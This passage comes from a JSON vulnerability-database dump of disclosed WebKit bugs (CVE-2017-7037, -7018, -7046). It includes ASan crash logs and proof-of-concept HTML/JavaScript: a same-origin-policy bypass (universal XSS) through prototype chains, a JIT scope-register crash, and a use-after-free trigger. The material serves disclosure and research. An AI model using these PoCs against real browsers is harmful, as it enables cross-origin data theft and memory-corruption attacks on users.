WebCore::createWrapper<WebCore::HTMLDocument, WebCore::Document>(WebCore::JSDOMGlobalObject*, WTF::Ref<WebCore::Document>&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x133b439)\r\n #23 0x1124efb1d in WebCore::createNewDocumentWrapper(JSC::ExecState&, WebCore::JSDOMGlobalObject&, WTF::Ref<WebCore::Document>&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x133ab1d)\r\n #24 0x1124efce8 in WebCore::toJS(JSC::ExecState*, WebCore::JSDOMGlobalObject*, WebCore::Document&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x133ace8)\r\n #25 0x112ac88fe in WebCore::createWrapper(JSC::ExecState*, WebCore::JSDOMGlobalObject*, WTF::Ref<WebCore::Node>&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x19138fe)\r\n #26 0x111f50f6b in WebCore::toJS(JSC::ExecState*, WebCore::JSDOMGlobalObject*, WebCore::Node&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd9bf6b)\r\n #27 0x1126e1040 in WebCore::JSDOMWindowBase::updateDocument() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x152c040)\r\n #28 0x113a707c3 in WebCore::ScriptController::initScript(WebCore::DOMWrapperWorld&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x28bb7c3)\r\n #29 0x10c925476 in WebCore::ScriptController::windowShell(WebCore::DOMWrapperWorld&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x3af476)\r\n\r\npreviously allocated by thread T0 here:\r\n #0 0x10f544d2c in __sanitizer_mz_malloc (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/8.1.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x56d2c)\r\n #1 0x7fffe883a281 in malloc_zone_malloc (/usr/lib/system/libsystem_malloc.dylib:x86_64+0x2281)\r\n #2 0x11f115ae4 in bmalloc::DebugHeap::malloc(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c54ae4)\r\n #3 0x11f10ac4d in bmalloc::Allocator::allocateSlowCase(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c49c4d)\r\n #4 0x11f0a0437 in bmalloc::Allocator::allocate(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1bdf437)\r\n #5 0x11f09f768 in WTF::fastMalloc(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1bde768)\r\n #6 0x1112fce08 in WebCore::Node::operator new(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x147e08)\r\n #7 0x111fa8d3d in WebCore::HTMLTableElement::create(WebCore::QualifiedName const&, WebCore::Document&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xdf3d3d)\r\n #8 0x111ecb5e3 in WebCore::tableConstructor(WebCore::QualifiedName const&, WebCore::Document&, WebCore::HTMLFormElement*, bool) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd165e3)\r\n #9 0x111ec61a4 in WebCore::HTMLElementFactory::createKnownElement(WTF::AtomicString const&, WebCore::Document&, WebCore::HTMLFormElement*, bool) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd111a4)\r\n #10 0x111e8aac9 in WebCore::HTMLConstructionSite::createHTMLElementOrFindCustomElementInterface(WebCore::AtomicHTMLToken&, WebCore::JSCustomElementInterface**) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xcd5ac9)\r\n #11 0x111e89e17 in WebCore::HTMLConstructionSite::createHTMLElement(WebCore::AtomicHTMLToken&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xcd4e17)\r\n #12 0x111e8a504 in WebCore::HTMLConstructionSite::insertHTMLElement(WebCore::AtomicHTMLToken&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xcd5504)\r\n #13 0x111feadf4 in WebCore::HTMLTreeBuilder::processStartTagForInBody(WebCore::AtomicHTMLToken&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xe35df4)\r\n #14 0x111fe7a43 in WebCore::HTMLTreeBuilder::processStartTag(WebCore::AtomicHTMLToken&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xe32a43)\r\n #15 0x111fe583e in WebCore::HTMLTreeBuilder::constructTree(WebCore::AtomicHTMLToken&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xe3083e)\r\n #16 0x111eb7bba in WebCore::HTMLDocumentParser::constructTreeFromHTMLToken(WebCore::HTMLTokenizer::TokenPtr&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd02bba)\r\n #17 0x111eb7779 in WebCore::HTMLDocumentParser::pumpTokenizerLoop(WebCore::HTMLDocumentParser::SynchronousMode, bool, WebCore::PumpSession&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd02779)\r\n #18 0x111eb69a6 in WebCore::HTMLDocumentParser::pumpTokenizer(WebCore::HTMLDocumentParser::SynchronousMode) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd019a6)\r\n #19 0x111eb842e in WebCore::HTMLDocumentParser::append(WTF::RefPtr<WTF::StringImpl>&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd0342e)\r\n #20 0x1118a5351 in WebCore::DecodedDataDocumentParser::flush(WebCore::DocumentWriter&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x6f0351)\r\n #21 0x1119e103d in WebCore::DocumentWriter::end() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x82c03d)\r\n #22 0x1119a0386 in WebCore::DocumentLoader::finishedLoading() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x7eb386)\r\n #23 0x11142f997 in WebCore::CachedResource::checkNotify() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27a997)\r\n #24 0x1114292aa in WebCore::CachedRawResource::finishLoading(WebCore::SharedBuffer*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2742aa)\r\n #25 0x113db0c41 in WebCore::SubresourceLoader::didFinishLoading(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2bfbc41)\r\n #26 0x10cfff2eb in WebKit::WebResourceLoader::didFinishResourceLoad(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa892eb)\r\n #27 0x10d002689 in void IPC::handleMessage<Messages::WebResourceLoader::DidFinishResourceLoad, WebKit::WebResourceLoader, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)>(IPC::Decoder&, WebKit::WebResourceLoader*, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa8c689)\r\n #28 0x10d001ba9 in WebKit::WebResourceLoader::didReceiveWebResourceLoaderMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa8bba9)\r\n #29 0x10c8a2683 in WebKit::NetworkProcessConnection::didReceiveMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x32c683)\r\n\r\nSUMMARY: AddressSanitizer: heap-use-after-free (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1343a) in WebCore::Node::nextSibling() const\r\nShadow bytes around the buggy address:\r\n 0x1c1800016db0: 00 00 00 00 00 00 00 00 fa fa fa fa fa fa fa fa\r\n 0x1c1800016dc0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd\r\n 0x1c1800016dd0: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd\r\n 0x1c1800016de0: fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa\r\n 0x1c1800016df0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd\r\n=>0x1c1800016e00: fa fa fa fa fa fa fa fa fd fd fd fd fd fd[fd]fd\r\n 0x1c1800016e10: fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa fa\r\n 0x1c1800016e20: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd\r\n 0x1c1800016e30: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00\r\n 0x1c1800016e40: 00 00 00 00 00 00 00 00 fa fa fa fa fa fa fa fa\r\n 0x1c1800016e50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\nShadow byte legend (one shadow byte represents 8 application bytes):\r\n Addressable: 00\r\n Partially addressable: 01 02 03 04 05 06 07 \r\n Heap left redzone: fa\r\n Freed heap region: fd\r\n Stack left redzone: f1\r\n Stack mid redzone: f2\r\n Stack right redzone: f3\r\n Stack after return: f5\r\n Stack use after scope: f8\r\n Global redzone: f9\r\n Global init order: f6\r\n Poisoned by user: f7\r\n Container overflow: fc\r\n Array cookie: ac\r\n Intra object redzone: bb\r\n ASan internal: fe\r\n Left alloca redzone: ca\r\n Right alloca redzone: cb\r\n==29516==ABORTING\r\n=================================================================\r\n-->", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/42362/"}], "packetstorm": [{"lastseen": "2017-07-26T22:47:05", "description": "", "published": "2017-07-25T00:00:00", "type": "packetstorm", "title": "WebKit JSC JSObject::putInlineSlow / JSValue::putToPrimitive XSS", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-7037"], "modified": "2017-07-25T00:00:00", "id": "PACKETSTORM:143482", "href": "https://packetstormsecurity.com/files/143482/WebKit-JSC-JSObject-putInlineSlow-JSValue-putToPrimitive-XSS.html", "sourceData": "`WebKit: JSC: UXSS via JSObject::putInlineSlow and JSValue::putToPrimitive \n \nCVE-2017-7037 \n \n \nJSObject::putInlineSlow and JSValue::putToPrimitive use getPrototypeDirect instead of getPrototype to get an object's prototype. So JSDOMWindow::getPrototype which checks the Same Origin Policy is not called. \n \nThe PoC shows to call a setter of another origin's object. \n \nPoC 1 - JSValue::putToPrimitive: \n<body> \n<script> \n \nlet f = document.body.appendChild(document.createElement('iframe')); \nlet loc = f.contentWindow.location; \nf.onload = () => { \nlet a = 1.2; \na.__proto__.__proto__ = f.contentWindow; \n \na['test'] = {toString: function () { \narguments.callee.caller.constructor('alert(location)')(); \n}}; \n}; \nf.src = 'data:text/html,' + `<iframe></iframe><script> \nObject.prototype.__defineSetter__('test', v => { \n'a' + v; \n}); \n \n</scrip` + `t>`; \n \n</script> \n</body> \n \n \nPoC 2 - JSObject::putInlineSlow: \n<body> \n<script> \n \nlet f = document.body.appendChild(document.createElement('iframe')); \nlet loc = f.contentWindow.location; \nf.onload = () => { \nlet a = { \n__proto__: f.contentWindow \n}; \n \na['test'] = {toString: function () { \narguments.callee.caller.constructor('alert(location)')(); \n}}; \n}; \nf.src = 'data:text/html,' + `<iframe></iframe><script> \nObject.prototype.__defineSetter__('test', v => { \n'a' + v; \n}); \n \n</scrip` + `t>`; \n</script> \n</body> \n \nThis bug is subject to a 90 day disclosure deadline. After 90 days elapse \nor a patch has been made broadly available, the bug report will become \nvisible to the public. \n \n \n \n \nFound by: lokihardt \n \n`\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/143482/GS20170725045736.txt"}, {"lastseen": "2017-07-26T22:47:05", "description": "", "published": "2017-07-25T00:00:00", "type": "packetstorm", "title": "WebKit JSC Incorrect Scope Register Handling", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-7018"], "modified": "2017-07-25T00:00:00", "id": "PACKETSTORM:143478", "href": "https://packetstormsecurity.com/files/143478/WebKit-JSC-Incorrect-Scope-Register-Handling.html", "sourceData": "` WebKit: JSC: Incorrect scope register handling in DFG::ByteCodeParser::flush(InlineStackEntry* inlineStackEntry) \n \nCVE-2017-7018 \n \n \nHere's a snippet of DFG::ByteCodeParser::flush(InlineStackEntry* inlineStackEntry). \n \nvoid flush(InlineStackEntry* inlineStackEntry) \n{ \n... \nif (m_graph.needsScopeRegister()) \nflush(m_codeBlock->scopeRegister()); <<--- (a) \n} \n \nAt (a), it should flush the scope register of |inlineStackEntry->m_codeBlock| instead of |m_codeBlock|. But it doesn't. As a result, the scope register of |inlineStackEntry->m_codeBlock| may have an incorrect offset in the stack layout phase. \n \nPoC: \nfunction f() { \n(function () { \neval('1'); \nf(); \n}()); \n \nthrow 1; \n} \n \nf(); \n \n \n \nThis bug is subject to a 90 day disclosure deadline. After 90 days elapse \nor a patch has been made broadly available, the bug report will become \nvisible to the public. \n \n \n \n \nFound by: lokihardt \n \n`\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/143478/GS20170725014438.txt"}, {"lastseen": "2017-07-26T22:47:05", "description": "", "published": "2017-07-25T00:00:00", "type": "packetstorm", "title": "WebKit WebCore::RenderObject Use-After-Free", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-7046"], "modified": "2017-07-25T00:00:00", "id": "PACKETSTORM:143488", "href": "https://packetstormsecurity.com/files/143488/WebKit-WebCore-RenderObject-Use-After-Free.html", "sourceData": "` WebKit: use-after-free in WebCore::RenderObject with accessibility enabled \n \nCVE-2017-7046 \n \n \nThere is a use-after-free security vulnerability in WebKit. The vulnerability was confirmed on ASan build of WebKit nightly. \n \nNote that accessibility features need to be enabled in order to trigger this bug. On Safari on Mac this can be accomplished by opening the inspector (simply opening the inspector enables accessibility features). On WebKitGTK+ (and possibly other WebKit releases) accessibility features are enabled by default. \n \nPoC: \n \n================================================================= \n \n<style> \n#link { text-transform: lowercase; } \nlink::first-letter { border-spacing: 1em; } \n</style> \n<script> \nfunction go() { \ndt.appendChild(link); \nvar s = link.style; \ns.setProperty(\"display\", \"table-column-group\"); \ns.setProperty(\"-webkit-appearance\", \"menulist-button\"); \n} \nfunction eventhandler() { \ndir.setAttribute(\"aria-labeledby\", \"meta\"); \nlink.appendChild(table.rows[0]); \n} \n</script> \n<body onload=go()> \n<link id=\"link\"> \n<meta id=\"meta\"> \n<dir id=\"dir\"> \n<table id=\"table\"> \n<th>1</th> \n<dt id=\"dt\"> \n<iframe onload=\"eventhandler()\"></iframe> \n \n================================================================= \n \nASan log: \n \n================================================================= \n==30692==ERROR: AddressSanitizer: heap-use-after-free on address 0x608000090ac8 at pc 0x00010841ba26 bp 0x7fff5ca8ea60 sp 0x7fff5ca8ea58 \nREAD of size 4 at 0x608000090ac8 thread T0 \n==30692==WARNING: invalid path to external symbolizer! \n==30692==WARNING: Failed to use and restart external symbolizer! \n#0 0x10841ba25 in WebCore::RenderObject::RenderObjectBitfields::hasLayer() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x6aa25) \n#1 0x10a8983fe in WebCore::RenderElement::addChild(WebCore::RenderObject*, WebCore::RenderObject*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x24e73fe) \n#2 0x10ab7d6ec in WebCore::createTextRenderer(WebCore::Text&, WebCore::RenderTreePosition&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27cc6ec) \n#3 0x10ab7b057 in WebCore::RenderTreeUpdater::updateTextRenderer(WebCore::Text&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27ca057) \n#4 0x10ab7abfa in WebCore::RenderTreeUpdater::updateRenderTree(WebCore::ContainerNode&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27c9bfa) \n#5 0x10ab7a47b in WebCore::RenderTreeUpdater::commit(std::__1::unique_ptr<WebCore::Style::Update const, std::__1::default_delete<WebCore::Style::Update const> >) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27c947b) \n#6 0x108b1f7e9 in WebCore::Document::resolveStyle(WebCore::Document::ResolveStyleType) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x76e7e9) \n#7 0x108b20287 in WebCore::Document::implicitClose() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x76f287) \n#8 0x108ec59ce in WebCore::FrameLoader::checkCompleted() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb149ce) \n#9 0x108ec2d0c in WebCore::FrameLoader::finishedParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb11d0c) \n#10 0x108b3e493 in WebCore::Document::finishedParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x78d493) \n#11 0x1090b25c0 in WebCore::HTMLDocumentParser::prepareToStopParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd015c0) \n#12 0x108bdd093 in WebCore::DocumentWriter::end() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x82c093) \n#13 0x108b9c386 in WebCore::DocumentLoader::finishedLoading() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x7eb386) \n#14 0x10862b997 in WebCore::CachedResource::checkNotify() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27a997) \n#15 0x1086252aa in WebCore::CachedRawResource::finishLoading(WebCore::SharedBuffer*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2742aa) \n#16 0x10afacc41 in WebCore::SubresourceLoader::didFinishLoading(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2bfbc41) \n#17 0x105ec22eb in WebKit::WebResourceLoader::didFinishResourceLoad(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa892eb) \n#18 0x105ec5689 in void IPC::handleMessage<Messages::WebResourceLoader::DidFinishResourceLoad, WebKit::WebResourceLoader, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)>(IPC::Decoder&, WebKit::WebResourceLoader*, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa8c689) \n#19 0x105ec4ba9 in WebKit::WebResourceLoader::didReceiveWebResourceLoaderMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa8bba9) \n#20 0x105765683 in WebKit::NetworkProcessConnection::didReceiveMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x32c683) \n#21 0x10550f3b5 in IPC::Connection::dispatchMessage(std::__1::unique_ptr<IPC::Decoder, std::__1::default_delete<IPC::Decoder> >) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xd63b5) \n#22 0x105518888 in IPC::Connection::dispatchOneMessage() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xdf888) \n#23 0x1162c0312 in WTF::RunLoop::performWork() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c03312) \n#24 0x1162c0d41 in WTF::RunLoop::performWork(void*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c03d41) \n#25 0x7fffd2f753c0 in __CFRUNLOOP_IS_CALLING_OUT_TO_A_SOURCE0_PERFORM_FUNCTION__ (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0xa73c0) \n#26 0x7fffd2f562cc in __CFRunLoopDoSources0 (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x882cc) \n#27 0x7fffd2f557c5 in __CFRunLoopRun (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x877c5) \n#28 0x7fffd2f551c3 in CFRunLoopRunSpecific (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x871c3) \n#29 0x7fffd24b6ebb in RunCurrentEventLoopInMode (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30ebb) \n#30 0x7fffd24b6cf0 in ReceiveNextEventCommon (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30cf0) \n#31 0x7fffd24b6b25 in _BlockUntilNextEventMatchingListInModeWithFilter (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30b25) \n#32 0x7fffd0a51e23 in _DPSNextEvent (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x46e23) \n#33 0x7fffd11cd85d in -[NSApplication(NSEvent) _nextEventMatchingEventMask:untilDate:inMode:dequeue:] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x7c285d) \n#34 0x7fffd0a467aa in -[NSApplication run] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x3b7aa) \n#35 0x7fffd0a111dd in NSApplicationMain (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x61dd) \n#36 0x7fffe89118c6 in _xpc_objc_main (/usr/lib/system/libxpc.dylib:x86_64+0x108c6) \n#37 0x7fffe89102e3 in xpc_main (/usr/lib/system/libxpc.dylib:x86_64+0xf2e3) \n#38 0x10316c56c in main (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/XPCServices/com.apple.WebKit.WebContent.xpc/Contents/MacOS/com.apple.WebKit.WebContent.Development:x86_64+0x10000156c) \n#39 0x7fffe86b8234 in start (/usr/lib/system/libdyld.dylib:x86_64+0x5234) \n \n0x608000090ac8 is located 40 bytes inside of 96-byte region [0x608000090aa0,0x608000090b00) \nfreed by thread T0 here: \n#0 0x1031d4294 in __sanitizer_mz_free (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/8.1.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x57294) \n#1 0x116307f30 in bmalloc::Deallocator::deallocateSlowCase(void*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c4af30) \n#2 0x10a79d874 in WebCore::RenderBlock::createFirstLetterRenderer(WebCore::RenderElement*, WebCore::RenderText*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x23ec874) \n#3 0x10a79e15a in WebCore::RenderBlock::updateFirstLetter(WebCore::RenderBlock::RenderTreeMutationIsAllowed) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x23ed15a) \n#4 0x10a783761 in WebCore::RenderBlock::layout() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x23d2761) \n#5 0x10a80333f in WebCore::RenderBlockFlow::layoutLineBoxes(bool, WebCore::LayoutUnit&, WebCore::LayoutUnit&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x245233f) \n#6 0x10a7ca957 in WebCore::RenderBlockFlow::layoutBlock(bool, WebCore::LayoutUnit) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2419957) \n#7 0x10a7837d7 in WebCore::RenderBlock::layout() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x23d27d7) \n#8 0x10a7cfd9c in WebCore::RenderBlockFlow::layoutBlockChild(WebCore::RenderBox&, WebCore::RenderBlockFlow::MarginInfo&, WebCore::LayoutUnit&, WebCore::LayoutUnit&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x241ed9c) \n#9 0x10a7cc522 in WebCore::RenderBlockFlow::layoutBlockChildren(bool, WebCore::LayoutUnit&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x241b522) \n#10 0x10a7ca962 in WebCore::RenderBlockFlow::layoutBlock(bool, WebCore::LayoutUnit) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2419962) \n#11 0x10a7837d7 in WebCore::RenderBlock::layout() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x23d27d7) \n#12 0x10a7cfd9c in WebCore::RenderBlockFlow::layoutBlockChild(WebCore::RenderBox&, WebCore::RenderBlockFlow::MarginInfo&, WebCore::LayoutUnit&, WebCore::LayoutUnit&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x241ed9c) \n#13 0x10a7cc522 in WebCore::RenderBlockFlow::layoutBlockChildren(bool, WebCore::LayoutUnit&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x241b522) \n#14 0x10a7ca962 in WebCore::RenderBlockFlow::layoutBlock(bool, WebCore::LayoutUnit) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2419962) \n#15 0x10a7837d7 in WebCore::RenderBlock::layout() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x23d27d7) \n#16 0x10a7cfd9c in WebCore::RenderBlockFlow::layoutBlockChild(WebCore::RenderBox&, WebCore::RenderBlockFlow::MarginInfo&, WebCore::LayoutUnit&, WebCore::LayoutUnit&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x241ed9c) \n#17 0x10a7cc522 in WebCore::RenderBlockFlow::layoutBlockChildren(bool, WebCore::LayoutUnit&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x241b522) \n#18 0x10a7ca962 in WebCore::RenderBlockFlow::layoutBlock(bool, WebCore::LayoutUnit) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2419962) \n#19 0x10a7837d7 in WebCore::RenderBlock::layout() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x23d27d7) \n#20 0x10a7cfd9c in WebCore::RenderBlockFlow::layoutBlockChild(WebCore::RenderBox&, WebCore::RenderBlockFlow::MarginInfo&, WebCore::LayoutUnit&, WebCore::LayoutUnit&) 